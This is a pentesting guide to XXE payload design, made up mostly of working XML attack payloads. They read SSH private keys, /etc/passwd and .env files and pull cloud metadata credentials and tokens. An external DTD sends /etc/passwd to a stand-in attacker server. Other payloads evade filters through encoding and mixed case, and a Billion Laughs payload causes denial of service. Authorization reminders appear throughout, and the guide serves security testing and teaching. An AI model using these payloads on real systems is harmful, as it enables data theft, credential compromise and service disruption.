🔵Info0.0
XXE Payload Design
Comprehensive guide to designing effective XXE test payloads for various scenarios including classic XXE, blind XXE, and platform-specific attacks.
CWE-611: Improper Restriction of XML External Entity ReferenceOWASP Top 10:2021 - A05: Security Misconfiguration
Overview
Effective XXE testing requires carefully crafted payloads tailored to the target environment and vulnerability type. This guide covers payload design principles, techniques, and platform-specific considerations.
Payload Categories:
- Detection Payloads - Confirm XXE vulnerability exists
- Exploitation Payloads - Extract data or perform SSRF
- Platform-Specific Payloads - Target Windows, Linux, or specific applications
- Evasion Payloads - Bypass filters and WAFs
- OOB Payloads - Blind XXE with out-of-band exfiltration
Design Principles:
- Start with simple detection payloads
- Escalate to exploitation after confirmation
- Use safe targets initially (/etc/hostname, not /etc/shadow)
- Test incrementally to understand parser behavior
- Document what works for future reference
Basic Detection Payloads
Purpose: Determine if XML parser expands entities
Strategy:
- Internal entity test - fastest, lowest impact
- External entity to safe file
- External entity with network callback
Progressive Testing:
- Level 1: Internal entity (completely safe)
- Level 2: External entity to safe local file
- Level 3: External entity to your controlled server
- Level 4: External entity to sensitive file
Indicators of Success:
- Entity value appears in response (classic XXE)
- HTTP request received at your server (blind XXE)
- Error message reveals file path
- Response time increases (may indicate processing)
Internal Entity Detection
XMLinternal-entity-test.xml⚠️ Vulnerable
1<!-- Level 1: Internal entity test (safest) -->
2<?xml version="1.0" encoding="UTF-8"?>
3<!DOCTYPE root [
4 <!ENTITY test "ENTITY_EXPANSION_SUCCESS">
5]>
6<root>
7 <data>&test;</data>
8</root>
9
10<!-- Expected if vulnerable:
11 Response contains: ENTITY_EXPANSION_SUCCESS
12
13 Expected if not vulnerable:
14 Response contains: &test; (literal)
15 or parse error -->
16
17<!-- More specific test with unique marker -->
18<?xml version="1.0" encoding="UTF-8"?>
19<!DOCTYPE root [
20 <!ENTITY marker "xxe_test_12345">
21]>
22<root>
23 <field>▮</field>
24</root>
25
26<!-- Search response for: xxe_test_12345 -->Safe File Disclosure Detection
XMLsafe-file-test.xml⚠️ Vulnerable
1<!-- Level 2: External entity to safe files -->
2
3<!-- Linux: Safe system files -->
4<?xml version="1.0" encoding="UTF-8"?>
5<!DOCTYPE root [
6 <!ENTITY xxe SYSTEM "file:///etc/hostname">
7]>
8<root>
9 <data>&xxe;</data>
10</root>
11
12<!-- Windows: Safe system files -->
13<?xml version="1.0" encoding="UTF-8"?>
14<!DOCTYPE root [
15 <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
16]>
17<root>
18 <data>&xxe;</data>
19</root>
20
21<!-- Universal: Try to read /etc/issue or similar -->
22<?xml version="1.0" encoding="UTF-8"?>
23<!DOCTYPE root [
24 <!ENTITY xxe SYSTEM "file:///etc/issue">
25]>
26<root>
27 <data>&xxe;</data>
28</root>
29
30<!-- Expected if vulnerable:
31 Response contains file contents
32 (hostname, win.ini settings, OS version) -->Out-of-Band Detection Payloads
When to Use OOB:
- Response doesn't include XML content (blind XXE)
- Entity expansion errors suppressed
- Content not reflected in response
- Need confirmation without visible output
OOB Techniques:
- HTTP callback to your server
- DNS lookup to your domain
- FTP connection attempt
- Parameter entity with external DTD
Required Infrastructure:
- HTTP server you control (or Burp Collaborator)
- DNS server with logging (or interactsh.com)
- Monitor access logs for incoming requests
HTTP Out-of-Band Payload
XMLhttp-oob.xml⚠️ Vulnerable
1<!-- Simple HTTP callback -->
2<?xml version="1.0" encoding="UTF-8"?>
3<!DOCTYPE root [
4 <!ENTITY xxe SYSTEM "http://YOUR-SERVER.com/xxe-test">
5]>
6<root>
7 <data>&xxe;</data>
8</root>
9
10<!-- Using Burp Collaborator -->
11<?xml version="1.0" encoding="UTF-8"?>
12<!DOCTYPE root [
13 <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-ID.burpcollaborator.net/xxe">
14]>
15<root>
16 <data>&xxe;</data>
17</root>
18
19<!-- Using interactsh.com -->
20<?xml version="1.0" encoding="UTF-8"?>
21<!DOCTYPE root [
22 <!ENTITY xxe SYSTEM "http://YOUR-ID.oast.fun/xxe">
23]>
24<root>
25 <data>&xxe;</data>
26</root>
27
28<!-- Expected:
29 HTTP GET request received at your server
30 Check access logs or Burp Collaborator
31 Confirms XML parser makes external requests -->Parameter Entity OOB (Advanced)
XMLparameter-entity-oob.xml⚠️ Vulnerable
1<!-- Step 1: Create external DTD on your server (evil.dtd) -->
2<!-- evil.dtd contents:
3<!ENTITY % file SYSTEM "file:///etc/passwd">
4<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://YOUR-SERVER.com/?data=%file;'>">
5%eval;
6%exfiltrate;
7-->
8
9<!-- Step 2: Reference external DTD in payload -->
10<?xml version="1.0" encoding="UTF-8"?>
11<!DOCTYPE root [
12 <!ENTITY % dtd SYSTEM "http://YOUR-SERVER.com/evil.dtd">
13 %dtd;
14]>
15<root>
16 <data>test</data>
17</root>
18
19<!-- How it works:
20 1. Parser loads evil.dtd
21 2. evil.dtd defines parameter entities
22 3. %file reads /etc/passwd
23 4. %eval creates entity that sends data to your server
24 5. %exfiltrate triggers the request
25 6. Your server receives /etc/passwd in query string -->
26
27<!-- Simpler version for detection only -->
28<?xml version="1.0" encoding="UTF-8"?>
29<!DOCTYPE root [
30 <!ENTITY % remote SYSTEM "http://YOUR-SERVER.com/xxe.dtd">
31 %remote;
32]>
33<root>
34 <data>test</data>
35</root>Platform-Specific Payload Design
Linux Targets:
/etc/passwd- User accounts/etc/shadow- Password hashes (requires root)/etc/hosts- Host mappings/proc/self/environ- Environment variables/proc/self/cmdline- Process command line~/.ssh/id_rsa- SSH private keys/var/log/apache2/access.log- Web logs
Windows Targets:
C:/Windows/win.ini- Windows configC:/Windows/System32/drivers/etc/hosts- Host fileC:/boot.ini- Boot configuration (older Windows)C:/inetpub/wwwroot/web.config- IIS configC:/Users/[username]/.ssh/id_rsa- SSH keys
Application-Specific:
.env- Environment variables (many frameworks)web.config- ASP.NET configurationconfig/database.yml- Rails database configsettings.py- Django settingscomposer.json/package.json- Dependency files
Linux-Specific Payloads
XMLlinux-targets.xml⚠️ Vulnerable
1<!-- Read /etc/passwd -->
2<?xml version="1.0" encoding="UTF-8"?>
3<!DOCTYPE root [
4 <!ENTITY xxe SYSTEM "file:///etc/passwd">
5]>
6<root><data>&xxe;</data></root>
7
8<!-- Read application .env file -->
9<?xml version="1.0" encoding="UTF-8"?>
10<!DOCTYPE root [
11 <!ENTITY xxe SYSTEM "file:///var/www/html/.env">
12]>
13<root><data>&xxe;</data></root>
14
15<!-- Read SSH private key -->
16<?xml version="1.0" encoding="UTF-8"?>
17<!DOCTYPE root [
18 <!ENTITY xxe SYSTEM "file:///home/user/.ssh/id_rsa">
19]>
20<root><data>&xxe;</data></root>
21
22<!-- Read application source code -->
23<?xml version="1.0" encoding="UTF-8"?>
24<!DOCTYPE root [
25 <!ENTITY xxe SYSTEM "file:///var/www/html/index.php">
26]>
27<root><data>&xxe;</data></root>
28
29<!-- Read process environment (often contains secrets) -->
30<?xml version="1.0" encoding="UTF-8"?>
31<!DOCTYPE root [
32 <!ENTITY xxe SYSTEM "file:///proc/self/environ">
33]>
34<root><data>&xxe;</data></root>Windows-Specific Payloads
XMLwindows-targets.xml⚠️ Vulnerable
1<!-- Read win.ini -->
2<?xml version="1.0" encoding="UTF-8"?>
3<!DOCTYPE root [
4 <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
5]>
6<root><data>&xxe;</data></root>
7
8<!-- Alternative path format -->
9<?xml version="1.0" encoding="UTF-8"?>
10<!DOCTYPE root [
11 <!ENTITY xxe SYSTEM "file://c:\\Windows\\win.ini">
12]>
13<root><data>&xxe;</data></root>
14
15<!-- Read IIS web.config -->
16<?xml version="1.0" encoding="UTF-8"?>
17<!DOCTYPE root [
18 <!ENTITY xxe SYSTEM "file:///C:/inetpub/wwwroot/web.config">
19]>
20<root><data>&xxe;</data></root>
21
22<!-- Read hosts file -->
23<?xml version="1.0" encoding="UTF-8"?>
24<!DOCTYPE root [
25 <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
26]>
27<root><data>&xxe;</data></root>
28
29<!-- UNC path to network share -->
30<?xml version="1.0" encoding="UTF-8"?>
31<!DOCTYPE root [
32 <!ENTITY xxe SYSTEM "file:////attacker-server/share/file.txt">
33]>
34<root><data>&xxe;</data></root>SSRF Payload Design
SSRF via XXE Targets:
- Internal web applications (http://localhost:8080)
- Cloud metadata services (http://169.254.169.254)
- Internal databases (MySQL, Redis, Memcached)
- Admin panels (http://admin.internal)
- Internal APIs (http://api.internal)
SSRF Techniques:
- Port scanning internal network
- Accessing cloud metadata (AWS, GCP, Azure)
- Interacting with internal services
- Bypassing IP-based restrictions
- Exploiting trust relationships
Common Targets:
http://localhost- Local serviceshttp://127.0.0.1- Loopbackhttp://169.254.169.254- Cloud metadatahttp://192.168.1.1- Internal networkhttp://10.0.0.1- Private network
SSRF Payload Examples
XMLssrf-payloads.xml⚠️ Vulnerable
1<!-- Access localhost service -->
2<?xml version="1.0" encoding="UTF-8"?>
3<!DOCTYPE root [
4 <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
5]>
6<root><data>&xxe;</data></root>
7
8<!-- AWS metadata service -->
9<?xml version="1.0" encoding="UTF-8"?>
10<!DOCTYPE root [
11 <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
12]>
13<root><data>&xxe;</data></root>
14
15<!-- GCP metadata service -->
16<?xml version="1.0" encoding="UTF-8"?>
17<!DOCTYPE root [
18 <!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
19]>
20<root><data>&xxe;</data></root>
21
22<!-- Azure metadata service -->
23<?xml version="1.0" encoding="UTF-8"?>
24<!DOCTYPE root [
25 <!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">
26]>
27<root><data>&xxe;</data></root>
28
29<!-- Internal API -->
30<?xml version="1.0" encoding="UTF-8"?>
31<!DOCTYPE root [
32 <!ENTITY xxe SYSTEM "http://internal-api.local/secrets">
33]>
34<root><data>&xxe;</data></root>Filter Evasion Techniques
Common Filters to Bypass:
- Keyword blacklists (SYSTEM, ENTITY, DOCTYPE)
- Protocol restrictions (file://, http://)
- URL validation
- Character filtering
- Size limits
Evasion Techniques:
1. Encoding:
- UTF-16 encoding
- URL encoding (%53%59%53%54%45%4D)
- HTML entities (SYSTEM)
- Mixed case (SyStEm)
2. Alternative Protocols:
- php:// wrapper (PHP)
- jar:// protocol (Java)
- netdoc:// protocol (Java)
- gopher:// protocol
3. Path Manipulation:
- Path traversal (file:///../../../etc/passwd)
- Double encoding
- Unicode normalization
4. DTD Variations:
- External DTD subset
- Public identifiers
- Mixed internal/external DTD
Evasion Payload Examples
XMLevasion-payloads.xml⚠️ Vulnerable
1<!-- UTF-16 encoding -->
2<?xml version="1.0" encoding="UTF-16"?>
3<!DOCTYPE root [
4 <!ENTITY xxe SYSTEM "file:///etc/passwd">
5]>
6<root><data>&xxe;</data></root>
7
8<!-- URL encoding in entity value -->
9<?xml version="1.0" encoding="UTF-8"?>
10<!DOCTYPE root [
11 <!ENTITY xxe SYSTEM "file:///%65%74%63/%70%61%73%73%77%64">
12]>
13<root><data>&xxe;</data></root>
14
15<!-- Mixed case keywords -->
16<?xml version="1.0" encoding="UTF-8"?>
17<!DoCtYpE root [
18 <!EnTiTy xxe SyStEm "file:///etc/passwd">
19]>
20<root><data>&xxe;</data></root>
21
22<!-- PHP wrapper (PHP applications) -->
23<?xml version="1.0" encoding="UTF-8"?>
24<!DOCTYPE root [
25 <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
26]>
27<root><data>&xxe;</data></root>
28
29<!-- External DTD to bypass inline filtering -->
30<?xml version="1.0" encoding="UTF-8"?>
31<!DOCTYPE root SYSTEM "http://attacker.com/evil.dtd">
32<root><data>test</data></root>
33
34<!-- evil.dtd contains actual entity definitions -->Denial of Service Payloads
Warning: DoS payloads can crash applications and consume resources. Only test with explicit permission in controlled environments.
DoS Techniques:
- Billion Laughs (exponential entity expansion)
- Quadratic Blowup (nested entity expansion)
- External entity to slow resource
- Large file disclosure
- Infinite entity recursion (if supported)
Testing Safely:
- Start with small expansion factors
- Test in non-production first
- Monitor resource usage
- Have rollback plan
- Coordinate with operations team
DoS Payload Example (Use Carefully)
XMLdos-payload.xml⚠️ Vulnerable
1<!-- BILLION LAUGHS - Use only in authorized testing! -->
2<?xml version="1.0"?>
3<!DOCTYPE lolz [
4 <!ENTITY lol "lol">
5 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
6 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
7 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
8 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
9 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
10]>
11<lolz>&lol5;</lolz>
12
13<!-- This expands to 10^5 = 100,000 "lol" strings
14 Can be extended to lol9 for billions -->
15
16<!-- Safer test: Small expansion -->
17<?xml version="1.0"?>
18<!DOCTYPE test [
19 <!ENTITY a "aaaaaaaaaa"> <!-- 10 a's -->
20 <!ENTITY b "&a;&a;&a;&a;&a;"> <!-- 50 a's -->
21 <!ENTITY c "&b;&b;&b;&b;&b;"> <!-- 250 a's -->
22]>
23<test>&c;</test>
24
25<!-- External entity to large/slow resource -->
26<?xml version="1.0" encoding="UTF-8"?>
27<!DOCTYPE root [
28 <!ENTITY xxe SYSTEM "file:///dev/random">
29]>
30<root><data>&xxe;</data></root>Payload Design Checklist
Pre-Testing: ☐ Obtain written authorization ☐ Understand target platform (Linux/Windows) ☐ Identify XML processing endpoints ☐ Set up OOB infrastructure (server/Collaborator) ☐ Prepare monitoring tools
Payload Progression: ☐ Step 1: Internal entity test ☐ Step 2: External entity to safe file ☐ Step 3: External entity with OOB callback ☐ Step 4: Sensitive file disclosure (if authorized) ☐ Step 5: SSRF attempts ☐ Step 6: Platform-specific payloads
Testing Best Practices: ☐ Start with least invasive payloads ☐ Document what works and what doesn't ☐ Use unique markers in payloads (e.g., xxe_test_12345) ☐ Test with various encodings (UTF-8, UTF-16) ☐ Try different protocols (file://, http://, ftp://) ☐ Test filter evasion only if initial payloads blocked ☐ Never test DoS without explicit permission
Platform-Specific: ☐ Identify target OS from error messages/responses ☐ Use appropriate path separators (/ vs ) ☐ Test both absolute and relative paths ☐ Try common application-specific files ☐ Check for cloud metadata access
Documentation: ☐ Record all tested payloads ☐ Note which payloads worked ☐ Document parser behavior ☐ Save proof-of-concept for report ☐ Note any unusual responses or errors